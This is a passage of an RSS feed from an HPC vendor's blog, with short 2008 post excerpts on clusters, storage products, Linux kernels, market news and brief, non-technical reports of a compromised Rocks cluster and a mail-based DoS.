- me to go away and stop writing nice articles about Rocks, and stop helping Rocks users
- to punish/censor me
Yeah.</description>
    </item>
    
    <item>
      <title>Personal supercomputing, as long as it&#39;s under $10k USD</title>
      <link>https://blog.scalability.org/2008/10/personal-supercomputing-as-long-as-its-under-10k-usd/</link>
      <pubDate>Sat, 25 Oct 2008 05:30:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/personal-supercomputing-as-long-as-its-under-10k-usd/</guid>
      <description>The Johns (West and Leidel) at InsideHPC.com did a nice study on personal supercomputing at the site. It is worth a read. In short, they found people would find such boxen useful. But they don&amp;rsquo;t want to spend more than $10k for them. This is interesting at many levels. It matches up very well with informal/anecdotal data we have from conversations with users.
We noticed that users wanted personal supers many years ago.</description>
    </item>
    
    <item>
      <title>moderated by the [insert cluster distribution list] admins</title>
      <link>https://blog.scalability.org/2008/10/moderated-by-the-insert-cluster-distribution-list-admins/</link>
      <pubDate>Thu, 23 Oct 2008 23:14:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/moderated-by-the-insert-cluster-distribution-list-admins/</guid>
      <description>Yes folks, that&amp;rsquo;s right. Everything I now write for the [insert cluster distribution list] will be moderated, or more likely, simply discarded. I guess people don&amp;rsquo;t quite know how to treat their friends and supporters. I need to seriously rethink writing articles like this in the future. Go figure.</description>
    </item>
    
    <item>
      <title>Hardening security on your Rocks system(s)</title>
      <link>https://blog.scalability.org/2008/10/hardening-security-on-your-rocks-systems/</link>
      <pubDate>Thu, 23 Oct 2008 22:59:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/hardening-security-on-your-rocks-systems/</guid>
      <description>We now understand the attack vector. Turned out to be simple, and some of the things we have done have now closed that door. It was a pretty simple door, but still worth noting. BTW: some don&amp;rsquo;t like early disclosures of exploits. I have heard from ~6 people (off the Rocks list) since posting that they have seen similar attacks attempted. The entry point was via a shared user account. Once this account was compromised, our new friend from Romania started working.</description>
    </item>
    
    <item>
      <title>Rocks system under attack</title>
      <link>https://blog.scalability.org/2008/10/rocks-systems-under-attack/</link>
      <pubDate>Thu, 23 Oct 2008 17:30:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/rocks-systems-under-attack/</guid>
      <description>A customer has a Rocks cluster, and it was compromised yet again. We have tried hardening the system, but it appears that there is another vector, associated with key loggers and windows machines.
Sadly this customer&amp;rsquo;s problems are largely self-inflicted, as they can&amp;rsquo;t seem to operate without running as the root user. I could say more, but I am somewhat pissed off that some of our critical advice was ignored, and then we are the target of some anger for the fact that they ignored the advice and were hacked.</description>
    </item>
    
    <item>
      <title>status update</title>
      <link>https://blog.scalability.org/2008/10/status-update/</link>
      <pubDate>Thu, 23 Oct 2008 14:14:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/status-update/</guid>
      <description>One of our ISPs does indeed have an outage today. SLA? We don&amp;rsquo;t need no steen-keen SLA &amp;hellip; We have redundancy.</description>
    </item>
    
    <item>
      <title>Perfect storms</title>
      <link>https://blog.scalability.org/2008/10/perfect-storms/</link>
      <pubDate>Thu, 23 Oct 2008 14:10:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/perfect-storms/</guid>
      <description>The term Perfect Storm represents a coincidence (temporal or spatial near simultaneity) of events that cause a much larger effect than any one of the events normally would on its own. Perfect storms are, in some ways, a superposition of events. Every now and then you get to see one in action. Like now.
I won&amp;rsquo;t describe current economic times, or what I think are the causative effects. Just what I observe.</description>
    </item>
    
    <item>
      <title>... and something took down one of our links ...</title>
      <link>https://blog.scalability.org/2008/10/and-something-took-down-one-of-our-links/</link>
      <pubDate>Thu, 23 Oct 2008 12:26:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/and-something-took-down-one-of-our-links/</guid>
      <description>(or how to fail without really trying) We have a redundant pair of links into our site. Long history of seeing outages take down even (supposedly) SLA covered systems. This is why when I hear of SLAs for these systems, I snort in finely honed derision. They don&amp;rsquo;t work in these scenarios, and arguing about it won&amp;rsquo;t make them work. Redundancy is your only option. Anyone arguing otherwise hasn&amp;rsquo;t had to deal with an SLA and a company refusing to honor it.</description>
    </item>
    
    <item>
      <title>Why I am blocking hotmail.com</title>
      <link>https://blog.scalability.org/2008/10/why-i-am-blocking-hotmailcom/</link>
      <pubDate>Thu, 23 Oct 2008 03:34:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/why-i-am-blocking-hotmailcom/</guid>
      <description>No protest against Microsoft which owns that service. Just the unfortunate fact that hotmail is apparently the conduit now for a DoS attack against us. No, it&amp;rsquo;s not working. But I am assuming that someone somewhere has managed to corrupt the inbound mail access at hotmail. Have discarded about 12000 mails in the last 12 hours. May start blocking hotmail at the firewall, not even let it traverse our network. Sad.</description>
    </item>
    
    <item>
      <title>to be a 2x4 or not to be a 2x4 that is the question</title>
      <link>https://blog.scalability.org/2008/10/to-be-a-2x4-or-not-to-be-a-2x4-that-is-the-question/</link>
      <pubDate>Tue, 21 Oct 2008 17:30:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/to-be-a-2x4-or-not-to-be-a-2x4-that-is-the-question/</guid>
      <description>what if you discovered that your efforts in trying to win business were in fact being used to lever some other group down, and the groups speaking to you were simply there to use you as a lever. Or a 2x4 (two by four: basically a large block of wood used for support in framing, or, in a proverbial sense, for beating people and companies up). Since you are not going to win, no matter what you do, should you even expend the effort?</description>
    </item>
    
    <item>
      <title>Fresh new 2.6.27.2 kernel ... now mix in the nVidia driver and ...  Do&#39;h!</title>
      <link>https://blog.scalability.org/2008/10/fresh-new-26272-kernel-now-mix-in-the-nvidia-driver-and-doh/</link>
      <pubDate>Sun, 19 Oct 2008 17:29:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/fresh-new-26272-kernel-now-mix-in-the-nvidia-driver-and-doh/</guid>
      <description>Just built it this morning, as I wanted to test out a few things tomorrow. So I loaded it on the build machine. So far so good. Everything works. A bit faster too. Hmmm&amp;hellip;. maybe it forgot to scale the processor speed down during idle? Will look later. Ok, this machine has an nVidia Quadro FX/1100. Nice graphics card. Pull down the latest nVidia drivers, build them, and &amp;hellip; nothing.</description>
    </item>
    
    <item>
      <title>IAMJOE (I-AM-JOE or I AM JOE)</title>
      <link>https://blog.scalability.org/2008/10/iamjoe/</link>
      <pubDate>Sat, 18 Oct 2008 21:23:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/iamjoe/</guid>
      <description>I eschew talking politics on this blog. I simply don&amp;rsquo;t think it is right to do so here. This is a comment on a current event, so simply skip it if you have no interest in such things.
I watched in fascination and abject horror as our media descended upon a plumber one state and maybe 100 miles south of me. Full story and background at a humorous site I occasionally read.</description>
    </item>
    
    <item>
      <title>Indeed a glutton for punishment ...</title>
      <link>https://blog.scalability.org/2008/10/indeed-a-glutton-for-punishment/</link>
      <pubDate>Sat, 18 Oct 2008 17:57:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/indeed-a-glutton-for-punishment/</guid>
      <description>OFED 1.4-beta1 on IA64 (actually this is Ubuntu 8.04 server on IA64) in the office. I need a machine to act as a source/sink for IB for some testing.
root@itanic:~# uname -a
Linux itanic 2.6.24-19-mckinley #1 SMP Thu Aug 21 01:16:49 UTC 2008 ia64 GNU/Linux
root@itanic:~# ifconfig ib1
ib1       Link encap:UNSPEC  HWaddr 80-00-04-05-FE-80-00-00-00-00-00-00-00-00-00-00
          inet addr:192.168.11.239  Bcast:192.168.11.255  Mask:255.255.255.0
          inet6 addr: fe80::208:f104:396:3d36/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:2044  Metric:1
          RX packets:10 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12 errors:0 dropped:10 overruns:0 carrier:0
          collisions:0 txqueuelen:128
          RX bytes:728 (728.</description>
    </item>
    
    <item>
      <title>Cargo cult HPC</title>
      <link>https://blog.scalability.org/2008/10/cargo-cult-hpc/</link>
      <pubDate>Sat, 18 Oct 2008 17:19:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/cargo-cult-hpc/</guid>
      <description>This is a short thread of thought, which was triggered by a casual browse through Wikipedia on another topic (for an article I swear I am writing, right now, as I er &amp;hellip; uh &amp;hellip; write this). Way back in graduate school, we all had read Feynman&amp;rsquo;s book. Call it required reading at the academy. Good things came out of this, as we (a few friends and I) reverse engineered his discussions of differentiation under the integral sign and suddenly got a really powerful tool available to us (which seems to have pissed off a few profs in classes with homework, but that&amp;rsquo;s a story for another beer).</description>
    </item>
    
    <item>
      <title>going private?</title>
      <link>https://blog.scalability.org/2008/10/going-private/</link>
      <pubDate>Sat, 18 Oct 2008 15:57:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/going-private/</guid>
      <description>Short note on a story John linked to on InsideHPC.com. Should HPC vendors go private is the question. Of the three vendors listed, two of them are HPC vendors, the third is a general vendor with a few HPC sales.
Ok, who are the HPC vendors? This is a good question. I won&amp;rsquo;t give an exhaustive list, but the usual suspects are on that, where they derive all or most of their revenue from HPC.</description>
    </item>
    
    <item>
      <title>We get blasted from (distro) partisans when we say this ...</title>
      <link>https://blog.scalability.org/2008/10/we-get-blasted-from-distro-partisans-when-we-say-this/</link>
      <pubDate>Sat, 18 Oct 2008 15:02:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/we-get-blasted-from-distro-partisans-when-we-say-this/</guid>
      <description>&amp;hellip; so it is better to point out that the distro people are saying it themselves:
This is from lwn.net. Not me. Don&amp;rsquo;t shoot the messenger.
The link to the thread in question contains far more explosive (for distro partisans) content. Without cherry picking this author, he does a very good and succinct job of describing what Fedora is and what it is not. To wit:
Introduction of 4k stacks. Blew up lots of drivers, file systems, and other assorted things.</description>
    </item>
    
    <item>
      <title>Twas the month before SC08 ...</title>
      <link>https://blog.scalability.org/2008/10/twas-the-month-before-sc08/</link>
      <pubDate>Fri, 17 Oct 2008 14:05:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/twas-the-month-before-sc08/</guid>
      <description>&amp;hellip; and all throughout the high performance computing solutions house, all the creatures were stirring, they were using their own mouse. The JackRabbits were purring, pushing GB/s of data around, and the ΔV&amp;rsquo;s being booted, being worked, tested to be sound. The workers were filling orders, building units, making sure none were dead, while visions of high performance file systems and data motion danced in their heads. (with apologies to Clement Clarke Moore or Henry Livingston)</description>
    </item>
    
    <item>
      <title>Cudos to Cray!</title>
      <link>https://blog.scalability.org/2008/10/cudos-to-cray/</link>
      <pubDate>Thu, 16 Oct 2008 22:40:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/cudos-to-cray/</guid>
      <description>Buying back debt is a good thing. Company must be doing well. They had some rocky years for a while, but their costs are now under control, their market focus sharp, and they make their own stuff. John at InsideHPC has the scoop. They are obviously exploring new market directions (their CX unit announced last month), and this is a good thing. Hopefully they will get some bumper stickers out soon with &amp;ldquo;my other computer is a Cray&amp;rdquo; for SC08.</description>
    </item>
    
    <item>
      <title>This was interesting ...</title>
      <link>https://blog.scalability.org/2008/10/this-was-interesting/</link>
      <pubDate>Thu, 16 Oct 2008 22:34:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/this-was-interesting/</guid>
      <description>We were asked for an &amp;ldquo;emergency&amp;rdquo; quote for a system for a grant. One of the components fit nicely into the ΔV paradigm, basically as a disk to disk backup of 2x the main storage size for this cluster. The 24TB ΔV came in under $15k. Made me happy. Could have done the 36 TB ΔV, and I did consider it. It would have been overkill for this task. And it would have cost much less than $20k.</description>
    </item>
    
    <item>
      <title>PINOs</title>
      <link>https://blog.scalability.org/2008/10/pinos/</link>
      <pubDate>Thu, 16 Oct 2008 01:38:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/pinos/</guid>
      <description>It&amp;rsquo;s been a year, so I feel I can talk a little bit about this. I won&amp;rsquo;t name names or provide details. More than a year ago, we had a PINO. I didn&amp;rsquo;t detect it early enough, but have learned since what the signs are. A PINO is a &amp;ldquo;Partner In Name Only&amp;rdquo;. A PINO is a &amp;ldquo;partner&amp;rdquo; (notice the scare quotes). This &amp;ldquo;partner&amp;rdquo; wanted to work with us to help grow their cluster business.</description>
    </item>
    
    <item>
      <title>Nominations for readers choice &#34;best of HPC&#34; awards ...</title>
      <link>https://blog.scalability.org/2008/10/nominations-for-readers-choice-best-of-hpc-awards/</link>
      <pubDate>Wed, 15 Oct 2008 15:46:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/nominations-for-readers-choice-best-of-hpc-awards/</guid>
      <description>Linky here. I am not saying vote early and vote often. Just vote. This may be the most important election in our lifetimes &amp;hellip; er &amp;hellip; Anyone happy with their JackRabbits, by all means, I encourage you to show your support.</description>
    </item>
    
    <item>
      <title>Evolving accelerator market</title>
      <link>https://blog.scalability.org/2008/10/evolving-accelerator-market/</link>
      <pubDate>Tue, 14 Oct 2008 23:12:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/evolving-accelerator-market/</guid>
      <description>I haven&amp;rsquo;t posted on accelerators in a while, and this will be short. I have posited that GPUs would basically win out in the accelerator wars, with possibly a distant second to something like Cell if enough of them could be made inexpensively available. My question now is, given the intent of Intel in this market, will Larrabee be able to get traction in the graphics world? And therefore, effectively displace nVidia (and to a lesser extent, AMD) as the accelerator king?</description>
    </item>
    
    <item>
      <title>Ouch</title>
      <link>https://blog.scalability.org/2008/10/ouch/</link>
      <pubDate>Tue, 14 Oct 2008 22:35:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/ouch/</guid>
      <description>Saw this on the beowulf list today regarding MD3000s from Dell.
I hope this is not true. Jeff, can you chime in and tell me if this is real or not?</description>
    </item>
    
    <item>
      <title>Designed to fail ...</title>
      <link>https://blog.scalability.org/2008/10/designed-to-fail/</link>
      <pubDate>Tue, 14 Oct 2008 16:57:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/designed-to-fail/</guid>
      <description>So I wrote a post in anger, and deleted it. My apologies.
I have a saying I like to tell people: things that are designed to fail, often do. I run into this day in and day out. Bad cluster designs, bad storage designs, bad network designs. Poor choices in all of the above. I still can&amp;rsquo;t get over the two 128 port switches coupled together with a single gigabit uplink.</description>
    </item>
    
    <item>
      <title>Pictures from Ohio Linux Fest</title>
      <link>https://blog.scalability.org/2008/10/pictures-from-ohio-linux-fest/</link>
      <pubDate>Mon, 13 Oct 2008 17:34:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/pictures-from-ohio-linux-fest/</guid>
      <description>You can see us (and a ΔV) in all its glory &amp;hellip; here &amp;hellip; Me talking to someone:
[ ](http://picasaweb.google.com/JohnBoker/Linuxfest2008#5256640887091893346)
I am the guy without so much hair (on his head), and black JackRabbit shirt, and the water in his right hand. Here is the &amp;ldquo;booth&amp;rdquo;
[ ](http://picasaweb.google.com/JohnBoker/Linuxfest2008#5256640896772943522)
Here is a picture of Doug looking as tired as we both felt &amp;hellip;
[ ](http://picasaweb.google.com/JohnBoker/Linuxfest2008#5256640900034994482)
But wait &amp;hellip; there&amp;rsquo;s more! we had a very nice &amp;hellip; I can&amp;rsquo;t say enough nice things about nVidia cards, nice nVidia card in our Cuda box, which we used to &amp;hellip; er &amp;hellip; run a desktop. That was streaming something like 7 movies from ΔV while we were rotating a number of OpenInventor and WRL (VRML) models using the OpenInventor ivview.</description>
    </item>
    
    <item>
      <title>Reaction to ΔV</title>
      <link>https://blog.scalability.org/2008/10/reaction-to-%ce%b4v/</link>
      <pubDate>Sun, 12 Oct 2008 12:06:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/reaction-to-%ce%b4v/</guid>
      <description>We showed off a unit at the Ohio Linux Fest this past weekend. We had it streaming anywhere from 3-10 videos while doing lots of other things. Needless to say, the interest there was striking. We gathered a great deal of good feedback, as well as quite a few (hopeful) leads. I had set up apache2 to stream movies from the Internet Archive that I had pulled onto the machine for other tests.</description>
    </item>
    
    <item>
      <title>A peek within the ΔV kimono ...</title>
      <link>https://blog.scalability.org/2008/10/a-peek-within-the-v-kimono/</link>
      <pubDate>Tue, 07 Oct 2008 21:23:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/a-peek-within-the-v-kimono/</guid>
      <description>What you see below is from a $5400USD list price machine on initial run through, pre-tuning. Please remember that as you look at these numbers. This is less than $1USD per usable GB. Will be formally introduced/announced soon. You can see one live at ohiolinuxfest this weekend (this exact machine as it turns out). This is a RAID6 unit. We could go RAID5 and increase performance, though that would mean running in a configuration we do not recommend.</description>
    </item>
    
    <item>
      <title>Wrestling with insects ...</title>
      <link>https://blog.scalability.org/2008/10/wrestling-with-insects/</link>
      <pubDate>Tue, 07 Oct 2008 03:49:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/wrestling-with-insects/</guid>
      <description>&amp;hellip; DragonFly in this case. Turns out that I had a wrong database setting that nuked one of our major functions. It would run the code. It just wouldn&amp;rsquo;t return anything. Turns out this was due to a missing column (do&amp;rsquo;h!). How a column goes missing &amp;hellip; I dunno. Ok, we moved it from an old machine to a newer dedicated machine. Maybe a column fell out of the bits when we trucked the data over.</description>
    </item>
    
    <item>
      <title>Cost of purchase for most HPC users</title>
      <link>https://blog.scalability.org/2008/10/cost-of-purchase-for-most-hpc-users/</link>
      <pubDate>Mon, 06 Oct 2008 17:14:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/cost-of-purchase-for-most-hpc-users/</guid>
      <description>&amp;hellip; is the biggest non-sunk cost aspect for an HPC system, outside any software licensing costs, which have a habit of often dwarfing the system cost. At InsideHPC.com, John West does an analysis of the RedHat HPC announcement.
In a word, yes. It is very much an issue for the broader market. Remember, HPC at the top is shrinking in relative terms as a fraction of the HPC market. I haven&amp;rsquo;t looked at the numbers recently, but it wouldn&amp;rsquo;t surprise me to see an absolute shrinkage as well.</description>
    </item>
    
    <item>
      <title>No, I did not have this in mind when we named the product ...</title>
      <link>https://blog.scalability.org/2008/10/no-i-did-not-have-this-in-mind-when-we-named-the-product/</link>
      <pubDate>Mon, 06 Oct 2008 00:33:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/no-i-did-not-have-this-in-mind-when-we-named-the-product/</guid>
      <description>JackRabbit that is &amp;hellip; And now for something completely different. A bunny with a mean streak, a mile wide &amp;hellip;</description>
    </item>
    
    <item>
      <title>Public Mercurial projects up</title>
      <link>https://blog.scalability.org/2008/10/public-mercurial-projects-up/</link>
      <pubDate>Mon, 06 Oct 2008 00:07:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/public-mercurial-projects-up/</guid>
      <description>Took me way too long to get these up. Our open source tools will be hosted here. Right now, simple tools like ifinfo, and bbs are up. Our public SGEtools will show up soon. Older releases of our finishing scripts will find their way there as well. We are deciding upon which other tools we will release this way. Please stay tuned.</description>
    </item>
    
    <item>
      <title>on &#34;broken&#34; OS installers ... well on the software that the OS installers depend upon ...</title>
      <link>https://blog.scalability.org/2008/10/on-broken-os-installers-well-on-the-software-that-the-os-installers-depend-upon/</link>
      <pubDate>Sun, 05 Oct 2008 00:22:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/on-broken-os-installers-well-on-the-software-that-the-os-installers-depend-upon/</guid>
      <description>Working out issues with the installation of an OS onto a CF device. Odd situation. OS installs all the way. Upon reboot, whammo, not enough grub to do more than print a message saying something to the effect of &amp;ldquo;you are hosed&amp;rdquo;. This is OpenSuSE 10.3 for a JackRabbit flying out the door Tuesday morning. Earlier if possible.
Turns out that this wasn&amp;rsquo;t confined to SuSE. A number of the other distros did the same thing.</description>
    </item>
    
    <item>
      <title>Delta-V is coming</title>
      <link>https://blog.scalability.org/2008/10/delta-v-is-coming/</link>
      <pubDate>Thu, 02 Oct 2008 04:15:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/delta-v-is-coming/</guid>
      <description>Will be showing a unit at OhioLinuxFest in Columbus late next week. Think &amp;hellip; less expensive than JackRabbit, and not as fast, though still pretty fast. This unit can scale down in performance and price, as well as up, to 36 TB per unit. Management via a web and cli interface. Price points are completely insane. Some very neat features &amp;hellip; more soon. I promise.</description>
    </item>
    
    <item>
      <title>... and it seems no fuzzy orange dice at SC this year</title>
      <link>https://blog.scalability.org/2008/10/and-it-seems-no-fuzzy-orange-dice-at-sc-this-year/</link>
      <pubDate>Thu, 02 Oct 2008 04:08:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/and-it-seems-no-fuzzy-orange-dice-at-sc-this-year/</guid>
      <description>Yup, you got it. YottaYotta is no more. Storage is a tough game.</description>
    </item>
    
    <item>
      <title>... and HP gobbles up Lefthand networks</title>
      <link>https://blog.scalability.org/2008/10/and-hp-gobbles-up-lefthand-networks/</link>
      <pubDate>Thu, 02 Oct 2008 00:30:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/and-hp-gobbles-up-lefthand-networks/</guid>
      <description>From WSJ:
Uh huh. Competition for EqualLogic.</description>
    </item>
    
    <item>
      <title>Cheapskates?  Nah... really?</title>
      <link>https://blog.scalability.org/2008/09/cheapskates-nah-really/</link>
      <pubDate>Tue, 30 Sep 2008 14:26:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/cheapskates-nah-really/</guid>
      <description>John West at InsideHPC.com points to an article on fault tolerant servers and the push to get them into HPC systems. One of the key soundbites is something John serves up
Well, that is one way of looking at it &amp;hellip;
It is arguably more correct to point out that cycles are cycles, and clusters offered an opportunity to massively expand lower cost cycles. Calling Supercomputing folks &amp;ldquo;cheapskates&amp;rdquo; isn&amp;rsquo;t likely to win you friends there.</description>
    </item>
    
    <item>
      <title>... and the market reacts ...</title>
      <link>https://blog.scalability.org/2008/09/and-the-market-reacts/</link>
      <pubDate>Mon, 29 Sep 2008 18:50:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/and-the-market-reacts/</guid>
      <description>5.56% of value wiped off the books. Right now we are at 10,523.07 on NYSE. 6.9% drop on NASDAQ. S&amp;amp;P 500 is down 7.05%. All this just today. Folks, this is about to get bumpy. 5% of market value just evaporated. That&amp;rsquo;s $50B of each $1T of market cap. A billion here, a billion there, and pretty soon we are talking about real money.
Tech got walloped. Our partners at Wipro had a 10% decline.</description>
    </item>
    
    <item>
      <title>wondering aloud ...</title>
      <link>https://blog.scalability.org/2008/09/wondering-aloud/</link>
      <pubDate>Sun, 28 Sep 2008 13:24:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/wondering-aloud/</guid>
      <description>&amp;hellip; if the fluctuation-dissipation theorem holds for what we are seeing in the economic state. Basically this theorem describes the power spectrum of the Fourier transform of a particular state variable in a system at or near equilibrium subject to external driving forces. That is, it helps you figure out where most of the driving force behind observed changes in that state variable is, while measuring the dissipation or irretrievable loss of energy in the system.</description>
    </item>
    
    <item>
      <title>Thoughts on the impact of the credit market meltdown on HPC</title>
      <link>https://blog.scalability.org/2008/09/thoughts-on-the-impact-of-the-credit-market-meltdown-on-hpc/</link>
      <pubDate>Sat, 27 Sep 2008 22:47:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/thoughts-on-the-impact-of-the-credit-market-meltdown-on-hpc/</guid>
      <description>It remains to be seen if this is happening, but &amp;hellip; Along comes company X, who wants to buy a large HPC system. They call up company Y, and ask them to build a system design and quote for them. Off Y goes, works through everything, gets updated pricing. They notice that all their T&amp;amp;Cs from their suppliers are suddenly Net-cash terms. Basically buy it, but pay with a credit card or other immediate instrument.</description>
    </item>
    
    <item>
      <title>SGI releases 2nd quarter results</title>
      <link>https://blog.scalability.org/2008/09/sgi-releases-2nd-quarter-results/</link>
      <pubDate>Sat, 27 Sep 2008 15:27:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/sgi-releases-2nd-quarter-results/</guid>
      <description>You can see them here. $93.8M revenue, $29.5M gross profit. COGS of $64.4M. OPEX of $58.1M. Operating profit (loss) is $29.5M - $58.1M or -$28.6M (or for the accounting types with us ($28.6M) ). When they are done with the rest of accounting, their net income is ($35.1M) or -$35.1M. This is a net loss, but it is lower than previous net losses by $4.6M. Their revenue increased $14.8M or so.</description>
    </item>
    
    <item>
      <title>CSD in restructuring to reduce costs</title>
      <link>https://blog.scalability.org/2008/09/csd-in-restructuring-to-reduce-costs/</link>
      <pubDate>Sat, 27 Sep 2008 14:45:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/csd-in-restructuring-to-reduce-costs/</guid>
      <description>I wasn&amp;rsquo;t aware of it until Doug pointed it out in our comment section. Short version, Clearspeed is in significant cost reduction mode right now. Reducing R&amp;amp;D to fulfill existing orders, reducing cost structures, etc. My follow-on comment addressed the interim results. You can see their share price versus time here on Yahoo. The decline looks like a straight line on a logarithmic graph. A long tail. Not quite the same as what the VCs like.</description>
    </item>
    
    <item>
      <title>Mention of JackRabbit in use at Wirth</title>
      <link>https://blog.scalability.org/2008/09/mention-of-jackrabbit-in-use-at-wirth/</link>
      <pubDate>Wed, 24 Sep 2008 16:05:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/mention-of-jackrabbit-in-use-at-wirth/</guid>
      <description>See this article on HPCwire (and another on SupercomputingOnline). Last month was one of our best JackRabbit months ever. In this market, with IT management under pressure to deliver better faster high performance storage service for less money, the case for JackRabbit is compelling. More soon though. I promise!</description>
    </item>
    
    <item>
      <title>when you&#39;re busy ... you really are busy ...</title>
      <link>https://blog.scalability.org/2008/09/when-youre-busy-you-really-are-busy/</link>
      <pubDate>Wed, 24 Sep 2008 15:53:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/when-youre-busy-you-really-are-busy/</guid>
      <description>Lots of new things, so little time. My apologies. Will update soon. I promise.</description>
    </item>
    
    <item>
      <title>Unwelcome surprises</title>
      <link>https://blog.scalability.org/2008/09/unwelcome-surprises/</link>
      <pubDate>Thu, 18 Sep 2008 03:31:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/unwelcome-surprises/</guid>
      <description>There I am, working on an RFP response. Figuring our partner needs this in Word format, the laptop is booted into Windows XP. Word 2003 is up. Several hours&amp;rsquo; worth of work. Saved often. Oh, you already know where this is going?
Yeah. It&amp;rsquo;s going there. Crash goes Word. Starts complaining it can&amp;rsquo;t read the disk. Never mind that it appears to be able to read the disk just fine in another window.</description>
    </item>
    
    <item>
      <title>A nice loading test</title>
      <link>https://blog.scalability.org/2008/09/a-nice-loading-test/</link>
      <pubDate>Sun, 14 Sep 2008 23:23:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/a-nice-loading-test/</guid>
      <description>A customer presented a nice test to us. We thought we had a good loading program going, running the units at heavy load for extended lengths of time. And these are good loading programs. But they weren&amp;rsquo;t as intensive as this customer&amp;rsquo;s. They run 8 bonnie++ jobs simultaneously on the system. So we ran it. And promptly crashed the unit.
Believe it or not, that was good. In the process we exposed a corner case where the later rev driver and updated firmware had a crash relative to the previous driver release with the same firmware.</description>
    </item>
    
    <item>
      <title>Linux kernel 2.6.26.5 is buggy, 2.6.27-rc6 works</title>
      <link>https://blog.scalability.org/2008/09/linux-kernel-26265-is-buggy-2627-rc6-works/</link>
      <pubDate>Sun, 14 Sep 2008 16:29:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/linux-kernel-26265-is-buggy-2627-rc6-works/</guid>
      <description>Alrighty. Been struggling to get an operational 2.6.26.5 kernel working for a customer. This is supposed to be the next generation of our supported kernels, replacing the now aging 2.6.23.14 kernel (you think ours is old? look at RHEL&amp;rsquo;s). It works fine on an Ubuntu system. All the things we needed built do, in fact, work. The problem was the immediate kernel panic on a RHEL5.2 system. 11 seconds in, it couldn&amp;rsquo;t find /dev/root (the root device).</description>
    </item>
    
    <item>
      <title>finally, I can point to a comparison someone else ran</title>
      <link>https://blog.scalability.org/2008/09/finally-i-can-point-to-a-comparison-someone-else-ran/</link>
      <pubDate>Sun, 14 Sep 2008 15:58:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/finally-i-can-point-to-a-comparison-someone-else-ran/</guid>
      <description>Have a look at this:
root@cisd-ruapehu # time dd if=/dev/zero of=80G bs=8192k count=10000
10000+0 records in
10000+0 records out
real 2m41.484s
user 0m0.064s
sys 2m26.890s
Quick calculation. This is a 44 disk raidz2 striped in the &amp;ldquo;optimal&amp;rdquo; manner according to the guide quoted. This is roughly 80GB in 161 seconds. Or, 0.497 GB/s. Under 500 MB/s. Yup. They show off their blazing 560 MB/s performance on smaller (mostly cached: 16GB system RAM, 20GB file) files.</description>
    </item>
    
    <item>
      <title>SGI late with financial filings</title>
      <link>https://blog.scalability.org/2008/09/sgi-late-with-financial-filings/</link>
      <pubDate>Fri, 12 Sep 2008 23:42:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/sgi-late-with-financial-filings/</guid>
      <description>Mercury news blog reports that SGI has told the SEC that it will be late in filing its financials for the quarter. Specifically
Read the full article, don&amp;rsquo;t jump to conclusions from this snippet. This said, I have yet to see any company say &amp;ldquo;hey we are gonna be late&amp;rdquo; and &amp;ldquo;wow, we just found this bucket of money in the corner!&amp;rdquo;. It is usually more along the lines of &amp;ldquo;oh, we have to pay that bill too?</description>
    </item>
    
    <item>
      <title>The impact of self-righteous decisions upon the real world: a simple case study</title>
      <link>https://blog.scalability.org/2008/09/the-impact-of-self-righteous-decisions-upon-the-real-world-a-simple-case-study/</link>
      <pubDate>Thu, 11 Sep 2008 20:44:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/09/the-impact-of-self-righteous-decisions-upon-the-real-world-a-simple-case-study/</guid>
